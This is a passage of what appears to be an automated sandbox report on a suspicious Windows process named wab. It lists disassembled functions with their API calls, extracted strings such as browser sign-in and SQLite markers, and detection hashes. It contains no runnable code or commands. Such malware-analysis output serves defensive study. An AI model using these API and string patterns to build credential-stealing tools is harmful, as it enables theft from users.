                                      • API ID: wcscpy
                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                      • API String ID: 1284135714-318151290
                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                      • String ID: 0$6
                                      • API String ID: 4066108131-3849865405
                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                      APIs
                                      • memset.MSVCRT ref: 004082EF
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • memset.MSVCRT ref: 00408362
                                      • memset.MSVCRT ref: 00408377
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 290601579-0
                                      • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                      • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memchrmemset
                                      • String ID: PD$PD
                                      • API String ID: 1581201632-2312785699
                                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                      APIs
                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                      • GetDC.USER32(00000000), ref: 00409F6E
                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                      • GetParent.USER32(?), ref: 00409FA5
                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                      • String ID:
                                      • API String ID: 2163313125-0
                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$wcslen
                                      • String ID:
                                      • API String ID: 239872665-3916222277
                                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$_snwprintfmemset
                                      • String ID: %s (%s)$YV@
                                      • API String ID: 3979103747-598926743
                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                      APIs
                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                      • wcslen.MSVCRT ref: 0040A6B1
                                      • wcscpy.MSVCRT ref: 0040A6C1
                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                      • wcscpy.MSVCRT ref: 0040A6DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                      • String ID: Unknown Error$netmsg.dll
                                      • API String ID: 2767993716-572158859
                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                      APIs
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 0040DAFB
                                      • wcscpy.MSVCRT ref: 0040DB0B
                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                      • API String ID: 3176057301-2039793938
                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                      APIs
                                      Strings
                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                      • unable to open database: %s, xrefs: 0042F84E
                                      • database %s is already in use, xrefs: 0042F6C5
                                      • database is already attached, xrefs: 0042F721
                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                      • too many attached databases - max %d, xrefs: 0042F64D
                                      • out of memory, xrefs: 0042F865
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                      • API String ID: 1297977491-2001300268
                                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                      • memcpy.MSVCRT ref: 0040EB80
                                      • memcpy.MSVCRT ref: 0040EB94
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                      • String ID: ($d
                                      • API String ID: 1140211610-1915259565
                                      • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                      • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                      APIs
                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                      • GetLastError.KERNEL32 ref: 004178FB
                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockSleepUnlock
                                      • String ID:
                                      • API String ID: 3015003838-0
                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                      APIs
                                      • memset.MSVCRT ref: 00407E44
                                      • memset.MSVCRT ref: 00407E5B
                                      • _mbscpy.MSVCRT ref: 00407E7E
                                      • _mbscpy.MSVCRT ref: 00407ED7
                                      • _mbscpy.MSVCRT ref: 00407EEE
                                      • _mbscpy.MSVCRT ref: 00407F01
                                      • wcscpy.MSVCRT ref: 00407F10
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                      • String ID:
                                      • API String ID: 59245283-0
                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                      • GetLastError.KERNEL32 ref: 0041855C
                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                      • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                      • GetLastError.KERNEL32 ref: 0041858E
                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                      • String ID:
                                      • API String ID: 3467550082-0
                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                      • API String ID: 3510742995-3273207271
                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                      • memset.MSVCRT ref: 00413ADC
                                      • memset.MSVCRT ref: 00413AEC
                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                      • memset.MSVCRT ref: 00413BD7
                                      • wcscpy.MSVCRT ref: 00413BF8
                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                      • String ID: 3A
                                      • API String ID: 3300951397-293699754
                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                      • wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                      • wcslen.MSVCRT ref: 0040D1D3
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                      • memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                      • String ID: strings
                                      • API String ID: 3166385802-3030018805
                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                      APIs
                                      • memset.MSVCRT ref: 00411AF6
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 00411B14
                                      • wcscat.MSVCRT ref: 00411B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                      • String ID: AE$.cfg$General$EA
                                      • API String ID: 776488737-1622828088
                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                      APIs
                                      • memset.MSVCRT ref: 0040D8BD
                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                      • memset.MSVCRT ref: 0040D906
                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                      • String ID: sysdatetimepick32
                                      • API String ID: 1028950076-4169760276
                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: -journal$-wal
                                      • API String ID: 438689982-2894717839
                                      • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                      • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Item$Dialog$MessageSend
                                      • String ID:
                                      • API String ID: 3975816621-0
                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 00444D09
                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                      • _wcsicmp.MSVCRT ref: 00444D33
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$wcslen$_memicmp
                                      • String ID: .save$http://$https://$log profile$signIn
                                      • API String ID: 1214746602-2708368587
                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                      • String ID:
                                      • API String ID: 2313361498-0
                                      • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                      • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                      • GetWindow.USER32(00000000), ref: 00405F80
                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
